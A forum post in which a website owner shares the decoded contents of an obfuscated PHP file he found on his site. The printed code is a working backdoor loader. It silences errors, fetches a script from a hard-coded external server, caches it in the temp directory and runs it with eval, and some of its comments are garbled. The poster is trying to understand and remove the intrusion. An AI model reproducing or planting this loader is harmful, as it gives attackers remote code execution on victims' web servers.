I don't really know a lot about PHP coding, more of a CSS/HTML guy, but spent some time on the content of the file that had been saved.
First off, the file isn't only encrypted by base64, it is also gz compressed. That explains why the online base64 decoders didn't work. Here's the first line of the file:
Code: Select all
<?php define("GR_HOST_ID", "ftp_index_part9"); eval(gzinflate(base64_decode(
During my research of the gzinflate and base64 decode, I've stumbled upon
this PHP decoder that did a pretty good job of deflating and decrypting the file AFAICS:
Code: Select all
?><?phpini_set("display_errors", 0);
error_reporting(0);
define("GR_CLIENT_VERSION", "remote_index_v1");
define("GR_SERVER_API_URL", "http://content.rcsrv.net/api.php");
define("GR_HOST_ID", "ftp_index_part2");
ID ïðîôèëÿdefine("GR_USE_CACHE_SCRIPT", true);
define("GR_CACHE_SCRIPT_TIME", 60*60*12);
12 ÷àñîâ, êýøèðîâàíèå ñêðèïòàfunction GR_Run() { if (GR_USE_CACHE_SCRIPT) { $cache_id = md5(GR_GetHostId()."script");
$script = GR_GetCache($cache_id, GR_CACHE_SCRIPT_TIME, $cache_filename);
if ($script == false) { $script = GR_ServerRequest("get_script");
GR_SaveCache($cache_id, $script);
} } else { $script = GR_ServerRequest("get_script");
} if ($script) { eval($script); }} function GR_Init() { if(!function_exists('str_ireplace')){ function str_ireplace($search,$replace,$subject){ if (is_array($search)) { foreach ($search as $id => $r_search) { $r_replace = is_array($replace) ? $replace[$id] : $replace; $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($r_search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($r_search)); $haystack = substr_replace($haystack,$token,$pos,strlen($r_search)); } $subject = str_replace($token,$r_replace,$subject); } } else { $token = chr(1); $haystack = strtolower($subject); $needle = strtolower($search); while (($pos=strpos($haystack,$needle))!==FALSE){ $subject = substr_replace($subject,$token,$pos,strlen($search)); $haystack = substr_replace($haystack,$token,$pos,strlen($search)); } $subject = str_replace($token,$replace,$subject); } return $subject; } } if (!function_exists("stripos")) { function stripos($str,$needle,$offset=0) { return strpos(strtolower($str),strtolower($needle),$offset); } }}function GR_GetHostId() { if (defined("GR_HOST_ID")) { $host_id = GR_HOST_ID; if (empty($host_id)) { $host_id = getenv("HTTP_HOST"); } } else { $host_id = getenv("HTTP_HOST"); } return $host_id;}function GR_ParseHeaders($s_headers) { $headers = array(); $hs = explode("\n", $s_headers); foreach ($hs as $h) { $h = trim($h); if (!empty($h)) { list($var, $value) = explode(": ", $h, 2); $headers[$var] = $value; } } return $headers;}function GR_ServerRequest($func_name, $vars = array()) { $url = GR_SERVER_API_URL."?ver=".GR_CLIENT_VERSION."&func=".urlencode($func_name)."&host_id=".urlencode(GR_GetHostId()); foreach ($vars as $var => $value) { $url .= "&".urlencode($var)."=".urlencode($value); } $a_full = file_get_contents($url); list($a_headers, $a_content) = explode("\r\n\r\n", $a_full, 2); $headers = GR_ParseHeaders($a_headers); if ($headers['status'] == "ok") { return $a_content; } else { return false; }}function GR_GetCachePath() { $path = false; if (function_exists('sys_get_temp_dir')) { $path = sys_get_temp_dir(); } else { if( $path = getenv('TMP') ) ; elseif( $path = getenv('TEMP') ) ; elseif( $path = getenv('TMPDIR') ) ; else { $path = tempnam(__FILE__,''); if (file_exists($path)) { unlink($path); $path = dirname($path); } } } return $path ? realpath($path) : false;}function GR_GetCache($filename, $time = 0, &$path) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; if (file_exists($path)) { if ($time == 0) { return file_get_contents($path); } elseif ($time > 0 and time()-filemtime($path) < $time) { /* cache is not expired */ return file_get_contents($path); } else { return false; } } else { return false; }}function GR_SaveCache($filename, $content) { $path = GR_GetCachePath().DIRECTORY_SEPARATOR.$filename.".che"; $fh = fopen($path, "w"); if ($fh) { fwrite($fh, $content); fclose($fh); return true; } else { return false; }} GR_Init();GR_Run();?><?
The above code is way beyond my knowledge of PHP. It does seem that the code above calls a server API at the defined link; the api.php file may have all of the referenced scripts. Whoever coded the above has some sense of humor. I did burst out laughing when I seen the variables of "$haystack,$needle".
As it is, I am not sure what the code above does; albeit, I am pretty sure that it isn't anything that should have been at my website.
Cr00zng